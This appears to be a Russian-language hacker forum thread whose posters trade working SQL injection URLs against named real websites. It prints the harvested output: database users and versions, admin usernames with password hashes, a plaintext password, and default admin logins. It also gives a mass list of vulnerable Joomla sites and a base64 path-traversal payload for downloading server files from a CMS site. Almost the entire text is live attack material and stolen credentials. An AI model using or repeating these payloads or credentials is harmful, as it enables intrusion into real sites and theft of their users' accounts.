SQL Инъекции

GTA.com

HTML:

ttp://www.gta.com/support/showReleaseNote/?id=-15+union+select+concat(USER(),0x3a,VERSION(),0x3a,DATABASE())/*

root@localhost:4.0.12-log:gta

HTML:

http://www.gta.com/support/showReleaseNote/?id=-15+union+select+concat(user,0x3a,password)+from+mysql.user/*

HTML:

http://www.gta.com/support/showReleaseNote/?id=-15+union+select+concat(user,0x3a,password)+from+mysql.user+limit+2,10/*

jmontilla:12107ef60046dd4c

 

Code:

http://www.mamochka.org/modules.php?name=Top&querylang=union+select+1,TABLE_NAME,3,4+from+INFORMATION_SCHEMA.TABLES/*

 

Code:

http://simplymichigan.com/blog/index.php?cat_id=99999+union+select+1,2,3,4,concat_ws(0x3a,user_name,password),6,7,8,9,10,11,12+from+users/*

michi18_michigan@localhost:michi18_michigan:4.1.22-standard

Code:

http://www.absolutemusic.co.uk/shop/index.php?cat_id=99999+union+select+1,2,3,4,5,6,7,8,9,10/*

absolute@localhost:absolute_:4.1.21-standard-log

 

ШОП discountcycleshop.co.uk

ddbuser1@localhost:4.1.22:discountdb

 

Code:

http://gp.by/index.php?mode=cat&cat_id=99999+union+select+1,2,3,4,5,6,7+from+admin/*

 

http://www.photosale.ru/index.php?page=-1+union+select+concat_ws(0x2F,version(),database(),user())/*

5.0.45-log/u41000/[email protected]

-----------------------------------------------------------------------------

biorust.com


http://www.biorust.com/index.php?page=tutorial_detail&tutid=-1'+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9,10,11,12/*

5.0.22/biorust_com/biorust@localhost


http://www.biorust.com/index.php?page=tutorial_detail&tutid=-1'+union+select+1,concat_ws(0x2F,admin_name,admin_password),3,4,5,6,7,8,9,10,11,12+from+biorust_com.linkbase_admins+limit+0,1/*

имя/хеш
Scrowler/4c2e348299295d7b87fa02fd14d89c7b


http://www.biorust.com/index.php?page=tutorial_detail&tutid=-1'+union+select+1,2,3,4,concat_ws(0x2F,username,password,email,icq),6,7,8,9,10,11,12+from+biorust_forums.user+limit+41000,1/*

логин/хеш/мейл/уин
premutos/35a8e932251deca43174675add295437/[email protected]/

 

http://grate.ru/index.php?cat_id=13'+union+select+0,1,2,3,4,5,conc at(version(),0x3a,user(),0x3a,database()),7,8,9,10 ,11,12,13,14,15/*

Нет доступа к шемке:РР

http://topofgames.com/index.php?cat_id=72'

Подставил какое-то значение не помню,вывело ашиппку.Стоит фильтрация на кавычку.Вместо неё куча обратных слешей:РР

http://www.dotfiles.com/index.php?cat_id=-6+order+by+1/*

Дыра есь,но как обойти хз:РР


http://www.nlstar.com/catalog/index.php?cat_id=17'+union+select+1,2,3/*

Дальше не канает :Р

 

mega.km.ru

Code:

http://mega.km.ru/ojigov/encyclop.asp?TopicNumber=1+or+1=@@version

@@version Microsoft SQL Server 2000 - 8.00.2039 (Intel IA-64) May 3 2005 23:34:52 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 1)
db_name() ojigov
system_user mega_link


через

Code:

http://mega.km.ru/ojigov/encyclop.asp?TopicNumber=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('dtproperties'))--

нашел таблицы:
dtproperties
Rubr
RubrLinksStat
Search
Stat
StatOrder
sysconstraints
syssegments

но интересных колонок в них не нашел=/
p.s. в mssql я очень плохо разбираюсь, это вобще моя первая mssql inj, так что не судите строго, делал всё согласно статье от [ cash ]

sosna1.ru
version() 5.0.45-log
user() [email protected]
database() u71952

Code:

http://sosna1.ru/info.php?infoid=19999+union+select+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6,7,8,9,10,11/*

ethanol.org
version() 4.1.15
user() ETHANOL@LOCALHOST
database() ETHANOLDB

djbattle.net
version() 4.1.12
user() djbattle@localhost
database() djbattle

Code:

http://www.djbattle.net/tv.php?tvID=99999+union+select+1,2,3,convert(concat(version(),0x3a,user(),0x3a,database()),binary),5,6,7,8,9,10,11/*

нашел таблицу users.

Code:

http://www.djbattle.net/tv.php?tvID=99999+union+select+111,2,333,convert(concat(min(id),0x3a,user,0x3a,pass,0x3a,mail),binary),5,6,7,8,9,10,11+from+users/*

id:user:рass:mail
3:tobbe:1skills2:[email protected]
он видимо админ

 

2 Велемир

Не тормози =\

HTML:

http://www.dotfiles.com/index.php?cat_id=6+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database())/*

HTML:

http://www.nlstar.com/catalog/index.php?cat_id=17'+UNION+SELECT+1,2,concat_ws(0x3a,version(),user(),database())/*

http://www.mosenergo.ru/

HTML:

http://www.mosenergo.ru/eng/index.php?id=226&news_id=-1055+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5+FROM+information_schema.tables/*&theme=56&sessid=4a

5.0.45-log:site@zvm5

 

xcedz

-1+union+select+1,TABLE_NAME,3,4+FROM+INFORMATION_S CHEMA.TABLES+LIMIT+1,1--

не работает .

 

Code:

http://www.job.khit.info/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(username,0x3a,password),17,18,19,20,21,22,23,24,25+from+kew_users/*

http://www.job.khit.info/administrator/
admin:40b5bf20806a044392ea48bc5c436262

SQL Инъекция в Joomla/Mambo Component Job (com_job), нашел я, но сайтов больше с такой инъекцией не нашел.

еще таблицы на этом домене (другие движки)

Code:

http://www.job.khit.info/index.php?option=com_job&task=showMoreUser&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,table_name,17,18,19,20,21,22,23,24,25+from+information_schema.tables/*

 

HTML:

http://www.islamicamagazine.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.pinfosystems.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.marketinginstyle.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.hatfielddesign.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.mangsidig.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.minet-services.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.bacanak.net/1/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.adeosys.net/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.sonicracingteam.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.fogl.co.yu/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.g-linq.nl/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.ninaris.hu/index.php?option=com_neoreferences&Itemid=27&catid=100500+union+select+concat(username,0x3a,password)+from+jos_users+limit+1/*
http://www.pcl-assistance.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.regionaleartiesten.nl/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.seventystudio.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.rstasarim.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.tribudefilles.com/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*
http://www.open-business.fr/index.php?option=com_neoreferences&Itemid=27&catid=100500+UNION+SELECT+CONCAT(USERNAME,0x3a,PASSWORD)+FROM+jos_users+LIMIT+1/*

PS Начинаем утреннею зарядку =)))

 

Mambo Component Events SQL Injection

Code:

http://www.nwen.org/index.php?option=com_events&Itemid=15&id=-1+union+select+concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+mos_users/*

http://www.nwen.org/administrator/
admin;admin

Найдено мной, сайтов с данным компонентом много, но на большинства, почему-то ничего не передается параметром id, который собственно и уязвим =/

 

http://www.kompak.ru:8100/new/news/new.php?num=-342+union+select+1,2,3,4,5,6,7/*
dbname = www
dbuser =www@localhost
dbversion =4.0.20

 

www.uselessjunk.com PR4

version: 5.0.26-Debian_2-log
database: uselessj_uj2006
user: uselessj_ohshitw@localhost

Через лимит выводим всех админов.


www.uselessjunk.com/admin.php -админка.
Есть форум, на дедике.

Но выведенные данные не подошли никуда,а к фтп я так и не смог законнектица.Шелл залить так же не вышло.

 

Code:

http://www.novostroy.ru/law/direct.php?num=1056437&id=99999+union+select+1,2,3/*

wwwnov@localhost:law:4.0.27-1-log

Code:

http://www.wholehealthexpo.com/information.php?infoid=99999+union+select+1,2,3,4,5,6/*

[email protected]:dbheal:4.0.27-max-log

Code:

http://www.plenki.net/shipping.php?infoID=99999+union+select+1,2,3/*

[email protected]:u10744:5.0.45-log

Code:

http://www.betonmaster.ru/index.php?view_info=yes&infoID=99999+union+select+1,2,3,4/*

zrim@localhost:betonmaster:4.1.22-log

Code:

http://www.djbattle.net/tv.php?tvID=99999+union+select+1,2,3,concat_ws(0x3a,user,PASS),5,6,7,8,9,10,11+from+users+limit+0,1/*

roundcube:583e2e1b2957e824

 

http://www.nlstar.com/catalog/index.php?cat_id=17'+union+select+1,2,concat(user,0x3a,password)+from+mysql.user/*

admin:40e369d51c6bd8e2
pma_WHy8zYQ73Zhn:1c4230400a8e14af
horde:234994c1665bd570
nl_star:270037157a74bbe3
nl_star_django:2490e08f0895cc0b

PPPPPP

 

www.davisvisitor.com

_http://www.davisvisitor.com/additional.php?id=-2+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5/*

4.0.16:dvb@localhost:dvb

Ни одной таблицы не смог подобрать. Если кто сможет-отпишите плз...

 

дерзаем

Таблицы
counter

 

http://www.modxcms.com
Официальный сайт CMS MODx

Существует иньекция и возможность скачать любые файлы с сайта.
Пример ссылки:

Code:

http://www.modxcms.com/assets/snippets/repository/repo_download/download.php?dwnParam=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vaG9tZS9odHRwZC92aG9zdHMvbW9keGNtcy5jb20vaHR0cGRvY3N8MTAzNyBBTkQgMT0xfHJlcG9fZGNvdW50fGluZGV4LnBocHxwYXNzd2Q

Для иньекции передаём строку кодированную в base64, приблизительно такого содержания:
1|2|repo_dcount|3|blabla.txt
1. - путь к файлу
2. - уязвимый параметр для SQLinj
3. - имя файла который хотим скачать
пример:
../../../../../../../../../../../../../../home/httpd/vhosts/modxcms.com/httpdocs|1037 AND 1=(select 1)|repo_dcount|index.php|passwd
--------------------------------------------------
не претиндую что первый, но нашёл 30 мин назад, хотел ставить себе эту CMS....